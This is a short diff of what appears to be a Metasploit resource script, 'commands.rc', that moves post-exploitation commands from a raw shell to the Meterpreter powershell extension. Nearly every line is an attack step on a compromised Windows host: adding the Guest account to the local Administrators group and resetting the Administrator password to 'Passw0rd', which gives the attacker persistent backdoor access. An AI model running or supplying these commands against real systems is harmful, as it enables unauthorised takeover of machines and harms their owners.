--- a/commands.rc
+++ b/commands.rc
@@ -1,5 +1,6 @@
-shell
-Net Localgroup Administrators Guest add
-net user Administrator Passw0rd
+load powershell
+powershell_execute "net localgroup administrators Guest /add"
+powershell_execute "net user Administrator Passw0rd"
 exit
-exit
+
+
